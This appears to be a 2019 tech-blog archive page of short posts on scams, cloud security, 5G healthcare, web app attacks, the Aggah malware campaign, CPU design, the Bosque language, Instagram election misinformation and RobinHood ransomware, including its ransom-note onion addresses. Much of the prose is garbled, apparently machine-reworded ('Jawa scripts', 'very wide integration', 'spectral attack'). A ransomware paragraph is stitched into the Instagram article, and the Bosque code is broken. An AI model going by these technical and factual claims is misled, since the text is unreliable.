Voice searches are now the next big things. Siri, google assistant, Cortana or other voice search software have a profound effect on internet searches and their speed. The voice search option has recently been used on many e-commerce websites.Also known as the virtual shopping assistant, they are popular among people of all ages because even when some are hypermetropic, they can always instruct by their voice commands. Forecasted; that by 2021 all the largest e-commerce website available on the internet will use voice search to attract more and more customers.

BETTER INTERACTION

Since AI has introduced the latest chatroom feature, customer interaction level has increased by a majority percentage. With the development of artificial intelligence technology, chatrooms are becoming more natural. They are beginning to give a more human feeling. Well, a customer doesn't have to search for everything himself. Just type in the chatroom and voilà, his question is answered. Implementing this AI has visibly increased customer interaction in each business.

EFFECTIVE MARKETING

You'll know your target audience. You'll know which of your subscribers want what kind of products. Therefore, you can narrow down the marketing and eventually target all GroupWise.
What your customers like
What they don't like
What kind of devices are people using to reach your site?
What kind of channels are they using?
What is the ideal time to sell a product to a custom?

Read More

04

May, 2019

SCAM

We really want to trust that the Internet is a safe place for online scams of any kind but always a "reality check" is a good thing. ...
We people can be an easy destination for malicious actors who want to rob our precious personal information.
Criminal minds can reach our private lives, homes and workplaces more than previously these days. And we can do little about it. Angriff tactics and devices vary between the traditional attack vector that uses the most popular programs and applications (including popular Windows operating systems) with malicious software and vulnerabilities, and ingenious phishing scams from unexpected places around the world in which justice does not go to any possible perpetrator.
Millennials are, in particular, more vulnerable to on-line scams than elderly people, the Federal Trade Commission (FTC) reports say. "40 percent of adults 20 to 29 years of age who reported fraud are finally lost money in fraud cases," the research concludes.
That is why, for unauthorised access to private information and financial information, we need to know what the most popular technologies malicious actors use. We should not forget that their ultimate goal is our cash and that they will do nothing to fulfill their mission.

1. Phishing email scams

According to a new report by F-Secure, more than one third of all incidents begin with phishing emails or malicious attachments sent to employees. Phishing scams continue to evolve and are a major online threat to users and organisations, who can see valuable information in malicious players ' hands. Phishing can be a daunting effect, so it is important to remain safe and to learn how to detect and prevent these attacks. Phishing scams are based on e-mail or social networking communication. In many cases, cybercriminals send users messages and e-mails by trying to make them supply them with valuable and sensitive information that can prove to them worthwhile (login credentials-from the Bank account, social network, a work account, cloud storage). In addition, these e-mails appear to be from an official source (such as banks or any other financial authority or user representatives of lawful companies or social networks).

2. The Nigerian scam

Probably one of the older and most popular internet scams used to trick different people mostly by a member of a Nigerian family. It is also called "Nigerian 419," named after the section that prohibited the practice of Nigeria's criminal code. A typical Nigerian scam includes emotional letters, text messages or social networks from a scammer who asks you to provide assistance with a great amount of money from a bank, initially with small fees, for papers and legal matters. This can be an official Governmental Member, a businessman or a member of a very rich family member, usually a female one. They promise you a very large sum in exchange for your assistance You will continue to pay more and more for additional services like transactions or transfers. You're even going to receive papers to make you think it's all true. At least, without the promised money, you are left broken.

3. Greeting card scams

We all get a holiday card from a friend or someone we care for in our Emailbox, whether it's Christmas or Easter. Whether it's from a friend. Card scams are another old Internet scam that malicious actors use to inject the most valuable data for malware and harvest users. Usually you can download and install malicious software onto your OS when you open this email and click on the card. The malware could be an annoying program that starts pop-ups with unforeseen windows throughout the screen.

4. Bank loan or credit card scam

"Too good to be true" banks that could guarantee large amounts of money and have already been pre-approved by the bank can easily be scammed. When you receive such an incredible pre-approved loan, ask yourself, "How can a bank offer you so much money without even checking and analyzing your financial situation?"Although this scam may seem unlikely to get people trapped, there are still a great many people who lost money by paying the" obligatory "fees for processing that the scammers require. With regard to credit card scams, the Identity Theft Resources Center has recently reported that last year there were increasing infringements of credit and debit card. Consider: monitoring your accountments carefully and monitoring your online transactions, taking advantage of free consumer protection services and signing up for free credit monitoring to better protect your data and prevent the thefts from accessing your payment card information.

5. Lottery scam

His is another classic scam on the Internet that appears not to get old. An email message that tells you you that you have earned a lottery scam and you have to pay a small fee to requested your prize or winnings.Happy you, okay?! You never remember buying lottery tickets. It does not even matter. As it addresses some of our wildest fantasies such as leaving our job and living off our fortune for the rest of our lives, without ever having to work again, we can easily find ourselves exposed to incredible scenarios from which someone can only dream.

Conclusion:

Because some scams are really well organized and convincing, and it's so hard to catch people behind them, we have to keep guard. Stay informed of the latest betrothal strategies.

Read More

03

May, 2019

Migrating to the cloud- Good or bad

It has been ages since hard drives have been in existence and people have used them for storing all their data. The generation of storage devices started with floppy disks and magnetic drives and has reached a point where solid state drives have begun to take over the world of storage media. ...
But this has also made storage devices more and more expensive., and with this, the era of cloud computing is starting to fall upon us. This blog discusses the shift towards cloud computing and whether it is a good or bad move for everyone.
Cloud computing includes the resources, such as servers, storage devices, operating systems, etc. that can be made available on demand for users to use for multiple purposes. Users can use cloud computing for developing software, running web applications, for storing their data, etc. Cloud computing can be deployed using various models which include Infrastructure-as-a-Service or IaaS, Software-as-a-Service or SaaS and Platform-as-a-Service or PaaS. IaaS involves the cloud computing resources, such as servers, storage media and other networking features, that users can straight away use and are provisioned and managed by the cloud provider. In SaaS, the cloud provider provisions the cloud customer with cloud software that the customer can use directly without worrying about the infrastructure or managing the software. PaaS involves the provisioning of a cloud environment by a cloud provider that can be used by customers to develop and deploy applications.
A lot of organisations have started to realise the fact that storage has become very expensive nowadays, and that cloud solutions would help them reduce costs for their businesses. Moving to the cloud is definitely the right solution, and it also provides excellent mobility as people can access it from anywhere. This shift in the paradigm, though, can have several security risks related to it. Information leaks and data breaches are viewed as the top dangers to cloud computing and the measures that are set up to relieve them are interlinked. For instance, the choice to scramble the information put away on the cloud can lessen the likelihood of an information leak, however, if the encryption key gets corrupted then data loss could occur as the data would not be able to get decrypted. Then again keeping backups of cloud information can decrease the danger of information loss yet increment the risk of information exposure. The nature of cloud computing makes it hard to react to a security incident. People do not consider security when they develop new applications and deploy them in cloud infrastructures, and this can lead to security events. Furthermore, vulnerabilities that likewise exist in the servers that exist in conventional server farms add to the hazard to cloud services.
The multiplication of portable gadgets that can access the cloud and the expanded reliance on the cloud infrastructure without a fortified cloud security methodology builds the danger of an information loss in the cloud. The absence of perceivability of the practices that end users take, and the absence of learning about the number of gadgets associated with a cloud likewise increment this hazard. The correct security advancements and methodology are required to be in place information assurance while utilising cloud assets. Most of the organisations are bypassing security practices, for example, reviewing information about the assets present on the cloud and performing audits.
Cloud use is developing at a quick pace and is frequently the main way companies can adapt to the quickly rising changes. The absence of information perceivability in the cloud alongside the absence of trust in the security practices of cloud suppliers prompts aversion in the essence of cloud selection. There is a worry that the clients of a cloud provider would not be advised in an opportune way in the instance of information leakage or loss and there is bigger dread that cloud suppliers don't have the vital security mechanisms in place.
There is a requirement for enterprises to track their information as it goes in the cloud
and to guarantee that the information is secured.

Read More

02

May, 2019

5G For Health Care

Traditionally, a complex regulatory environment and deeply embedded legacy systems have made the healthcare industry a laggard when it comes to adopting new technologies. ...
But over the past several years, the proverbial floodgates have opened, with technological innovation transforming care and transforming lives.Healthcare technology is about to get another shot in the arm.
This year we will be bringing the fifth generation of mobile internet connectivity, also known as 5G. The latest generation should deliver significant improvements in quality of care and patient experiences-as well as lower costs and more operational efficiencies.
5 G will introduce an era of personalized, self-directed healthcare, empowering patients to better manage their health and medical conditions. Ultimately, healthcare goals are not limited to finding better treatment solutions; medical practitioners also strive to build preventive practices that prevent treatment. 5 G is going to make those goals a reality.
Wearable technologies consisting of continuous monitoring and sensory processing devices already help patients achieve wellness and independence. We only scratched the surface of their potential, partly because of 4 G limitations. One of the biggest challenges facing IoT solutions is slow network speeds due to congestion.
Providers interface with many patients every day and transmitting large amounts of data on existing networks can be an incredibly slow process. Wearable devices require consistent, uniform and uninterrupted connectivity to be viable, and 5 G will provide this connectivity with an unprecedented level.
5 G Technology has the potential to help healthcare organizations meet the growing demands of IoT-focused transformation by paving the way for more data to be shared -faster - across networks.
"AT&T" claims that its live 5 G network has recently eclipsed the 1gigabits-per-second mark, and the technology should theoretically be able to achieve download speeds of 10 Gbps with one millisecond of latency. Compare that with a latency of 50 ms to 4 G speeds that average 15 megabits per second.
But speed is only part of 5 G technology, which in every sense is superior to 4G. For starters, its lower latency will allow for new and more advanced IoT applications that require rapid responsiveness, such as remote control of equipment.
In addition, 5 G will revolutionize data management. The technology can handle large and vital data sets more efficiently, allowing information to be consolidated into one platform. 5 G networks also have superhigh bandwidths that will allow more people to transmit larger files without slowing things down.
Soon, 5G-powered remote monitoring tools will enable doctors not only to keep an eye on local patients, but also to attend to anyone around the world without having to leave the office.The telemedicine market is expected to grow at a compound annual rate of about 17 percent by 2023, according to a study by Market Research Future. Growth will be primarily due to government-driven healthcare initiatives and demand for better healthcare in rural areas. Unlike its predecessor, 5 G will be able to support telehealth appointments ' high-resolution video requirements.
This means that patients will have more accessible healthcare, including access to specialists who might otherwise be unavailable. 5 G technology will enable medical professionals to quickly transmit massive files from X-ray machines, MRIs and other imaging machines. With immediate access to substantial data files, people and machines— charged with making critical decisions about patient health will be able to make them faster and more information.
We have already seen that AI is capable of fully diagnosing patients and recommending proper treatment plans. It can also predict possible complications in outpatients, enabling care providers to implement preventive measures But AI systems need massive amounts of data to learn and improve in real time, and that data typically comes from disparate sources and is delivered via mobile devices. In many cases, 4 G has not been able to reliably support this continuous data flow-that won't be a 5 G problem.
Nevertheless, none of this is to say that thanks to the next generation of connectivity, every healthcare problem will disappear. Seamless integration is far from guaranteed, but it is absolutely necessary if digital processes directly affect the health of individuals. Increasingly widespread concerns about patient privacy and Increasingly widespread concerns about patient privacy and the potential negative impact of data breaches in healthcare are well-founded and are not going anywhere. Security is imperative, especially when medical practitioners are transmitting medical data. It is also expensive to implement new technology. With the introduction of 5 G, old devices and infrastructure elements may become incompatible. Replacing these devices will be expensive for providers. However, these issues will need to be ironed out with urgency. In an interview with HealthTech Insider, Dr. Joseph Kvedar, VP of Connected Health at Partners HealthCare, summed up nicely the implications of 5 G on patient care: "If you place an Amazon order and it doesn't happen, the world doesn't stop. But if it's your pacemaker, it's a different matter."
While 5 G technology has the potential to improve the way we deliver healthcare, providers need to be incredibly strategic about how they use this new technology. With a little caution and some creative problem-solving, the next generation of internet connectivity is sure to change things for the better.

Read More

30

April, 2019

Web Application Security

It is an era of having interactive web resources which users can interact with and perform the tasks that they want to do easily. These interactive resources that make various services available to the users are called web applications. ...
This blog talks about web applications and their security. It also talks about how attackers could take advantage of the weaknesses present in web applications to steal sensitive information, cause damage to financial assets, and put adverse effects on target organisations.
A web application is a type of website in which there is a two-way interaction between the user and the dynamically generated website. It is different from a traditional website in the sense that a regular website only has static content which the user can only read and not interact with. At the beginning of the web, websites were altogether static accumulations of pages. Client connection was commonly constrained to route between pages utilising hyperlinks. Progressively, the innovation created to permit more noteworthy dimensions of client interactivity. Web forms were and still are a recognisable way a client can communicate with a website. An example of a web application could a social media website on which users can read and post information, make changes, and perform several other interactive tasks. Web applications are winding up to be increasingly common in various different sectors, such as the public, Government and corporate sectors. This is because of the improvements in web-based technologies and the changing work environment. Although web applications are an easy and effective solution, there are likewise various new security risks, that if not taken care of appropriately could possibly present critical dangers to an organisation's critical infrastructure. The rate at which web applications are being developed and deployed has made IT infrastructures more complex, and hence, it has become more challenging to secure these infrastructures. Companies have been needy upon security controls at the edge of the network, for example, hardware firewalls, to secure their network environment. But, since an ever increasing number of attacks are focusing on security weaknesses in web applications, for example, cross-site scripting vulnerabilities, it may not be adequate to secure web applications from such attacks using customary network security practices.
If web applications are not developed while taking security into account at each step of the development lifecycle, then vulnerabilities could be left in the source code of the web applications that threat actors could leverage to attack the web applications using several types of web application attacks and steal user data or perform other malicious activities. The types of attacks that are possible on web applications vary according to the various aspects related to a web application. Some of the major types of web application attacks are injection attacks, cross-site scripting (XSS) attacks, cross-site request forgery (CSRF) attacks, attacks that take advantage of broken access controls in the web application, attacks that leverage the misconfigurations in the security features of the web application, and several more.
If an attacker manages to execute these web application attacks successfully on a target web application, then they could be easily able to steal user credentials, bank account details, social media messages and other content, or even deface the target website. An example of attack could be a SQL injection attack in which an adversary creates a SQL query that they input into an input field, such as the username or password fields on a website form, and through that attack manages to get access to an administrator account and deletes sensitive database information stored in the target web application's database. This information could be all the user information stored in the database, or the whole database itself. Such an attack could cause a significant loss to the web application owners and also the users who use that web application. Let's say if the users' online bank account details have been wiped from the database using a SQL injection attack, and they had a lot of money in their account then that could cause a massive financial loss for the victims and the bank whose web application had the SQL injection vulnerability would also get into a lot of trouble.
Web applications are being used by more and more organisations each day which also increases the probability of there being more vulnerabilities exploited each day, and as web applications hold critical data, therefore, securing web applications should be a priority task.

Read More

26

April, 2019

A glance into Physical Security

Organisations put in place expensive security controls to secure their network infrastructure from cyber-attacks. They implement hardware and software controls to prevent their critical IT assets from being compromised and sensitive information from being stolen. ...
But what if someone comes in and takes away the computer systems along with them? What if they steal the asset itself? Attackers come up with new tricks and techniques to break into buildings, steal physical property, cause damage to critical assets, or even harm the people who work at the target organisation. This blog talks about physical security and the implications of not having a proper physical security mechanism in place.
Physical security is the mechanism which security professionals help an organisation put in place to secure their tangible property and human resources. Physical security helps prevent any theft, destruction or obstruction in the functionality of the physical property. It also helps in the protection of a company's personnel against any physical attacks by threat actors. It is intended to keep up the ease of use and usefulness of the item under security. It may also mean administration by privately owned businesses who provide different types of protection mechanisms. The things that may require security can be hardware, vehicles, buildings, or people. Physical security utilises auxiliary and specialised offices and gear, for example, impenetrable glass, barricades, detours, video reconnaissance, etc.
There are numerous physical security threats present that can cause significant damage to organisations, their assets and personnel. Some of them are terrorism, theft and burglary, physical assaults, natural disasters, and vandalism. Terrorism affects homes, offices and even countries. Terrorism affects multiple aspects of physical security on almost equal levels. Terrorism can go to extents where there could be a total loss of physical building and assets. It can also cause loss of life of an organisation's personnel. Theft and burglary are the most common types of physical security attacks in the world. Attackers try various different methods to try and steal a company's physical assets. For example, a thief could come into a company's premises during off hours, and if the physical security measures are not appropriate, then the thief could easily steal some servers or workstation computers.
A company's employees could also face physical assaults by threat actors. For example, some people who want to enter the company's building might use physical force, such as beating up the guards to gain entry into the building. Physical assault is also one of the most prominent types of physical security threats that exist in the world. Natural disasters include earthquakes, floods, fires, hurricanes, tornadoes and all other natural phenomena that can damage tangible property. Natural disasters can cause massive financial losses to organisations if the organisations have not taken measures to make sure that their physical property can withstand such catastrophes.
Vandalism is a physical security threat which involves the intentional destruction of physical property. It can also include disfiguring an organisation's buildings and other physical property. An example of vandalism would be when attackers throw rocks to break window glasses of a company’s office building to cause physical and financial damage to the company.
Physical threats can become reasons for significant damage to both people and property. Hence, it is necessary that an organisation implements appropriate physical security controls to make sure that their physical assets and human resources are safe from adversaries, and away from any harm.

Read More

25

April, 2019

Windows Malware 'Aggah' Infects Your Pc

The latest in a series of online attacks is' Aggah,' a global malware campaign with Middle East roots. ...
Windows Malware includes a commodity Trojan script that is spread through an infected Microsoft Word Document. The perpetrators are tricking users to download and activate the malicious code using RevengeRAT.Since RevengeRat consists of several open source Trojan builds, it is very difficult to identify the actual spammer. The people involved in this use the alias name ' aggah ' to perform their operation.
How 'Aggah' Works?
A malware attack in the Aggah campaign consists of three major steps:
E-mail a Word doc titled 'Activity.doc' to the target
Prompt users to enable content thus helping the doc to run macros
A Shell command redirects the user to a Blogspot site which downloads malicious scripts
The malware in the Aggah campaign is working very discreetly and in a large number of steps initiated by a macro.
Weakness Being Exploited
The older format docs (.doc,.ppt) have been replaced with the new XML-based format (.docx,.pptx) in Microsoft Open Office XML (OOXML). The OOXML files are made up of ZIP archives, called ' Parts, ' which are responsible for rendering a document when it is opened.
Parts rendering is regulated by ' Properties, ' which may or may not reference shared public resources using URLs. This may be exploited by hackers. Whenever such a document is opened, it leaves room for hackers to use Template Injection to load a malicious script instead of the actual document.
Template Injection: Template Injection is the process of replacing the blueprint of a server-side document with malicious code to be injected into an unsuspecting user's document.
The latest Windows Malware uses the following steps to exploit the above feature:
The user receives an E-mail titled 'Your account is locked' attached with a word document 'Activity.doc'.
The Document contains this photo asking users to 'view in desktop', 'Enable editing' and 'Enable Content'
Enabling content is the goal, then it fetches and loads an OLE document from a remote server, which contains an RTF (Rich Text Format), using Template Injection.
The RTF runs an excel sheet containing a heavily encrypted macro that loads a URL using Shell command to access the OS’ kernel. The Shell command downloads the contents of the URL of a Blogspot site.
The Blogspot side contains several Jawa scripts that disable the Microsoft Defender by changing its signature and also disable MS Office functions.
Then the Jawa Script changes key registry values of MS office apps to 1.
After that, the script disables Microsoft ProtectedView.
The script uses Pastebin to download the malicious code and run Shell commands.
This malware campaign targets financial institutions, government bodies, educational institutions, marketing agencies, etc. Cybersecurity Researchers, Unit42, based in Palo Alto, spotted the Windows malware campaign.
How To Stay Safe?
It is currently advised not to open any word document like the one mentioned above. Also, do not enable ' content ' in MS Word and only open suspicious docs using Office 365 as Macros cannot be enabled in it.
Malware attacks have seen a significant increase in recent years. From pirated Game of Thrones to Microsoft Word documents, everything that has the potential to direct heavy traffic is laced with malware.
Several Ransomware has also caused havoc, especially in the industrial engineering industry, causing hundreds of thousands of dollars in damage. In addition, several new types of Ransomware are also on the rise, disguising themselves as PC enhancing mods while encrypting user files away.

Read More

24

April, 2019

HOW ARE CPU DESIGNED AND CONSTRUCTED

We're all thinking about the CPU as a computer's "brains," but what does that mean? What happens inside your computer to do with the trillions of transistors? ...
? We'll concentrate on computer hardware design, covering what is working with a computer, in this new four-part mini-sery. The series covers computer architecture, the design of the circuit processor, VLSI (very wide integration), the construction of chips and future computing trends. If you always want to know how the processors work inside, stick around because that is what you want to know.
We start at a very high level of what a processor does and how the building blocks work together. It includes processor keys, memory hierarchy, prediction of branches, and more. First of all, we have to define what a CPU is doing. The easiest reason for this is that a CPU has a set of commands for certain input operations. For example, this can be to read a memory value, then add it to another value, then save the result back to the memory at another location. It might also be more complex to divide two numbers if the previous calculation results were greater than zero.
The program itself is a series of directions for the CPU to execute if you want to run a program such as an operating system or a game. These instructions are loaded from memory and are executed one by one on a simple processor until you complete the program. While software developers, for example, can't understand this when they write their programs in high-ranking languages like C++ or Python. It understands only 1s and 0s so that we need a format that represents code.
"Programme, as part of an instruction set architecture (ISA), are compiled into a set of low-level instructions called the assembly language. The CPU is designed to understand and execute these guidelines. The most frequent ISAs include x86, MIPS, ARM, RISC-V and PowerPC. Just as the C++ function syntax differs from the one that is the same in Python, so there is a distinct syntax in each ISA.
The ISAs can be divided between a fixed length and a variable length in two principal categories. The RISC-V ISA uses a fixed-length instruction to determine what type of instruction a predefined number of bits is in each instruction. This is different from x86 that uses the instructions for variable length. The x86 can encode instructions for various parts in various ways and with different bits. Due to this complexity, the x86 CPUs instruction decoder is the most complicated part of the entire design
Due to its regular structure, fixed-length instructions facilitate decoding and limit the number of total directives an ISA can bear. While the most popular versions of the RISC-V architecture have approximately 100 instructions and have open sources, x86 is proprietary. Generally, some thousands of x86 instructions are believed to exist, but the exact number is not public. All ISAs have the same core functionality, despite differences between them.
Now we are ready to start working with our computer. In fact, the execution of an instruction has several basic components which are split through the many processor stages. The first step is to enter the memory instruction on the CPU to start running. The instruction is decoded in the second step so that the CPU can determine which instruction it is. There are many types of instructions including arithmetic, branch and memory instructions. Once the CPU has knowledge of what type of instruction it executes, memory operators or internal registers on the CPU collect instruction operators. If you want to add A to B, you can only add it until you know the A and B values. The most up-to-date processors are 64-bit so every data value has a size of 64bit.
Following the CPU's instruction operators, it moves into the execution stage where the input is performed. This can be added, a logical manipulation of the numbers carried out or just passed through the numbers without alteration. Only the value in one of its internal registers could be retained by the CPU if memory is accessed to store the result. The CPU will update the condition of different elements after the result is saved and move to the next instruction.
Naturally, this description is an enormous simplification, which will be divided into 20, or more smaller, steps to improve efficiency by most modern processors. This means it can take 20 or more cycles to carry out a single directive from the start to the end, even though the processor will begin and finish several instructions each cycle. This model is usually termed a pipeline, because it takes a while to complete the pipeline and for the liquid to pass through it fully.
The entire cycle of instructions is a very close-knit choreography, but not all instructions can be completed at the same time. For example, the addition is very quick when it takes hundreds of cycles to load division or memory. More modern processors do not run out of order instead of declining the entire processor while one slow instruction is finished. This means that you will determine what instructions would be most beneficial for you to execute at a certain time. The processor can jump in the code if the current instruction is not ready, to see if anything else is ready.
Apart from execution, what is called a "super-scalar" architecture is used by typical modern processors. This means that the processor at every stage of the pipe is executing several instructions at once. It might also wait hundreds more to start executing them. The processors will have several copies of each pipeline step in order to execute many commands at once. When a processor sees two instructions ready to execute, and it doesn't have any dependence between them instead of waiting for them to finish individually, both will be executed simultaneously.
Although the processor may execute instructions which are ready in place of waiting ahead in line with those busy, speculation provides huge performance gains, it also exposes security vulnerabilities. In branch prediction and speculation, the famous spectral attack exploits bugs. The assailant would use specially crafted code to speculate about the processor's execution of memory values. Some aspects of speculation had to be redefined so that data could not be leaked, and performance fell slightly.
In recent decades, the architecture used in modern processors has been long overdue. Innovations and smart design have led to greater performance and improved use of the underlying hardware. But CPU makers are very confidential about the technology in their processors so what is going on inside is impossible to understand exactly. That said, the fundamental principles of how computers function in all processors are standardized. Intel can add its secret sauce in order to increase cache hit rates, or AMD can add a advanced branch predictor.

Read More

22

April, 2019

MICROSOFT NEW PROGRAMMING LANGUAGE:BOSQUE

What is Bosque:

Bosque is a combination of Syntax TypeScript and ML and Semantic JavaScript. In short, everybody who has ever created a front end app will know the language. ...
The language contains nominal types and structural types.
The Bosque Programming Language is a Microsoft Research project that explores language concepts for writing code which are simple, apparent and easy to understand. In the development and coding process, key design features of a language provide ways to prevent accidental complexity.
The result is improved productivity of developers, improved software quality, and new compilers and developing tooling experiences are enabled. This project will be set up around an open‐source (MIT) licensed Github repository to facilitate cooperation with other researchers and the wider developer community. .
This project welcomes contributions from community groups including, issues, comments, requests for referrals and research based on the Bosque language or improvement. Marron explains in his technical paper: "This model builds upon the achievements of structured programming and abstract information by simplifying existing programming models into regularized format that eliminates major sources of error.
It simplifies code understanding and modification, and transforms many automatic logistical tasks into trivial proposals. With Bosque a functional model with unchangeable data, all values are unchanging. When it is free of side ‐effects, Bosque documentation states that the impact of block declaration is simplified. Functional languages have benefited from program development simplifications, sophisticated tools and compiler optimisations made possible by this model.
Lambda builders combine lambda code definition with variable copy semanthics to shut off the captured variables on the creation of lambda. A simple, unopined type system allows the use in order to communicate the intent and codes relevant features of the problem field of a range of structural, combined and nominal types.
Arguments named, like rest and diffusion operators, are provided. They can manipulate data as part of calls and building operations.
Massive Algebraic Data Operations start with bulk readings and data values updates in Bosque. Operators have developed help to focus code on general intention and to allow
developers to make algebraic reasoning about the operations of data structure.
For data types, tuples, records, and nominal types, and for operations including projection, multi - update, and merge algebraic operations are provided.
The structured loops are traded for high - level processing constructs with iterative processing capabilities. Removal of the boiler plate from the same loop removes error
classes including bound calculations ; intent is made clear.

Bosque becomes Microsoft's latest language project that has made C #, an object‐oriented language, the F #, a functional language, and the TypeScript, a typed JavaScript superset. The software giant has achieved a good deal of popularity in developing languages.

Bulk Algebraic Data Operations:

BOSQUE starts with the bulk algebraic operation with mass reading and updating of data values. In addition to the elimination of chances of forgetting or confusing a field, BOSQUE operators help focus the code on the overall aim instead of being covered up in individual steps.
For example:
@[7 , 9]
( @[7 , 8 ] ) =~(0=5 , 3=1) ; / / @[5 , 8 , none , 1]
( @[7 , 8 ] ) =+(@[5]) ; / / @[7 , 8 , 5]
( @{ f =1 , g =2})@{f , h } ; / / @{f =1 , h=none }
( @{ f =1 , g =2}) =~( f =5 , h =1) ; / / @{f =5 , g =2 , h=1}
(@{ f =1 , g =2}) =+(@{ f =5 , h =1}) ; / / @{f =5 , g =2 , h=1}
Baz@identity ( 1 )@{f , h } ; / / @{f =1 , h=t ru e }
Baz@identity ( 1 )@{f , k } ; / / error
Baz@identity ( 1 ) =~( f =5) ; / / Baz@{f =5 , g =1 , h=t ru e }

None Processing:

No values are null or undefined in Bosque. Bosque uses "elvis" operator support for all chainable actions as well as specific non - coalescing rather than following JavaScript's truthful coalescing.
@{}.h / / none
@{}.h . k / / error
@{}.h ? . k / / none
@{h = {}} . h ? . k / / none
@{h={k =3}}. h ? . k / / 3
f u n c t i o n d e f a u l t ( x ? : I n t , y ? : I n t ) : I n t {
return ( x ? | 0) + ( y ? | 0) ; / / d e f a u l t on none
}


Automic Constructors:
The language also regularizes the development of atomic builders. This is achieved through "direct field initialization to build the value of the entity."

For example:
concept Bar {
f i e l d f : I n t ; f a c t o r y d e f a u l t ( ) : { f : I n t } {
return @{f =1};
}
}
e n t i t y Baz p r o v i d e s Bar {
f i e l d g : I n t ;
f i e l d h : Bool = t ru e ;


A Side By Side Comparision:
When compared with JavaScript and Bosque, you can see what Marron means by eliminating "accidental complexity." As a regulated programming language, Bosque aims to make JavaScript's and other structured programming languages more declared and concise.

Conclusion:
In a wide field of programming, Bosque presents an interesting paradigm shifting. Watching how language matures as an instrumentation ecosystem develops around it will be worthwhile. Microsoft has provided open source contributors under a MIT license to access the new programming language on their website. In Microsoft's GitHub repo, you can explore Bosque.

Read More

20

April, 2019

Instagram is now a hotbed for falsified news & misinformation

The voluntary 'ethics code' for general elections issued by the EC does not mention Instagram independently. ...
Instagram has become a hotbed for false news and misinformation in the recent weeks, experts say, raising concerns about whether the election committee is properly monitoring the social network platform for objectionable political content, which includes Facebook‐owned photography and video‐sharing.
The volunteer 'Ethics code' for general elections issued by EC does not include Instagram separately, while the WhatsApp sister company says analytical companies, strategists and fact ‐checkers. If the platform is monitored, they said, it is unclear.
Prashant Puri, CEO at digital marketing company AdLift, said: "Our analysis shows that the number of political posts in Instagram is on the rise. The most popular hashtags on Instagram include the ones which revolve around BJP, Congress, Narendra Modi, Rahul Gandhi, AAP and Samajwadi Party". "Then the Instagram handles are followers from a few hundred tens of thousands."The #Abhoganyay, #Congesshaina and #Namoagain have been some of the highly used hashtags. False news and misinformation are abundant.
"They are Congress and SP workers, who have been arrested and accused of beating Cashmir's youth in saffron clothes," claimed one post posted by the modi again account. Another person called Narendra Modi. Indian claimed that 89 percent of PM Modi's 2014 commitments have been fulfilled or are in progress according to a BBC report. The BBC did not report on this.
The same handle that had more than 3,5 lake followers also said the nation lost iron man to the "colorful" Nehru, Sardar Vallabhbhai Patel to the "mute" Manmohan Singh and should not lose Narendra Modi to "the silly pappu" now Sardar Vallabhbhai Patel to the "future" Over 16 lakh posts have been generated by hashtags like Narendra Modi, Congress, BJP, and Rahul Gandhi.
In response to the ET's questions, the election commission has not requested the company to remove any objectionable information and that no accounts or posts linked to false news and misinformation on political parties and candidate countries have been removed from the platform. Instagram stated that. Until the press was released, the Election Commission did not answer ET's inquiries.
Some 48 hours of silence before the first polling leg, around 500 Facebook posting and links and two posting on Twitter, as per EC officials. In addition, one number of WhatsApp was deactivated, but Instagram has not been mentioned until now.
The sweetheart will also drop sweetheart notes under four different names. These notices are named Decryption ReadMe, Decrypt Files.html, Help Help Help.html and Help Important.html. The following are the names.These rescue notes include information about files, rescue amounts, and links to TOR web sites in which users can leave a message to the attackers or decrypt 3 files up to 10 MB free of charge.
Shammas Oliyath, founder of Check4Spam, a non-profit company that verifies posts on social media, said: "It's surprising, if true, that the Instagram may not be monitored on counterfeit polling posts." "For images already found and disfigured on other social channels, reporting them on Instagram should also be straightforward. I understand however, that the extraction of a text and then verification is more work for memes/trolls than any manual effort may be necessary during the season," he added.
"I think EC ought to have been much more proactive on social media and EC overstated the strength of social media today, too," said Oliyath. Priyanka Jha, a researcher at Alt News, said a lot of false news is circulating on Instagram. There is a lot of false news. "Fake news and unreasonable contents on Instagram are not monitored," she said. "There is a lot of unnoticed misinformation on the platform and there are a lot of pages and stories about divisive politics and propaganda currently in circulation and this content certainly has been uploaded late."
On Tuesday, IMAI said its social media intermediaries have committed to supporting India's Election Commission in holding free and fair elections in India. IMAI said it was a social media intermediary. The 48‐hour' silence period' is very critical for that purpose and participants in the 2019 Voluntary Code of Ethics for General Election, he said.
The volunteer code of ethics has established a high priority channel to communicate with the nodal officers designated by EC, says the association, participating companies such as BIGO, Byte Dance, Faceboop/WhatsApp, Google, ShareChat and Twitter. Participants also agreed to act expeditiously in accordance with the law on the content reported by the Nodal Officer.

Read More

18

April, 2019

Robin Hood Ransomeware

What Is Robin Hood Ransomeware

There are many surprises in the world of cybersecurity. From the use of Game of Thrones to the exploitation of popular ...
porn sites ‐ renowned cyber criminals continue to find new ways to harm you.
In a related development, a RobinHood ransomware spreads havoc in North Carolina, where most of our city's PCs have been crippled by the ransomware. The FBI and local authorities are currently investigating the matter.
What is interesting about RobinHood are surprising statements by its creators. Payment page of the ransomware states that developers are concerned with users ' privacy. Your privacy is important to us and after your payment you will remove all your records, including your IP and encryption keys.The page also mentions that for each victim the bitcoin address that is used to pay ransom is freshly created, and therefore it can not be tracked.
Not much of this ransomware is known and a sample of RobinHood is still not found. We saw the ransom notes and encrypted files of various victims, however, so that we can create an overview of how this ransomware works They emphasize that the privacy of the victim is important to them and that they are not going to disclose victims who paid.
But at least a portion of the restitution collected is unlikely to be transferred effectively to charities. A Heimdal Security (a Danish cybersecurity software seller) representative pointed out in this regard, that "We can't trust cyber criminals if we can't tell the truth (currently) to have a kind and generous side."
The creators of the ransomware "Robin Hood" are asking their victim to pay for the fraudsters ' "good intentions." Many fraudsters use children for illegal purposes. It is worth mentioning.


RobinHood Targets Networks

The RobinHood attackers actively attempt to access networks based on the ransom note text. Once you have access, you will try to encrypt as many computers on your network as possible.While nothing about the encryption used is known, we know it's renamed Encrypted b0a6c73e3e434b63.enc robinhood when it's crypted .. com files are.
The sweetheart will also drop sweetheart notes under four different names. These notices are named Decryption ReadMe, Decrypt Files.html, Help Help Help.html and Help Important.html. The following are the names.These rescue notes include information about files, rescue amounts, and links to TOR web sites in which users can leave a message to the attackers or decrypt 3 files up to 10 MB free of charge.
The current addresses used in the ransom note are:
http://xbt4titax4pzza6w.onion/
https://xbt4titax4pzza6w.onion.pet/
https://xbt4titax4pzza6w.onion.to/
These notes offer different amounts of payment depending on whether a single computer or a whole network should be decrypted. For instance, the rescue rate was 3 bitcoins per computer or 7 network bitcoins in the ransom notice seen by Bleeping Computer.It also states that the ransom will grow by $ 10,000 per day following the fourth day.


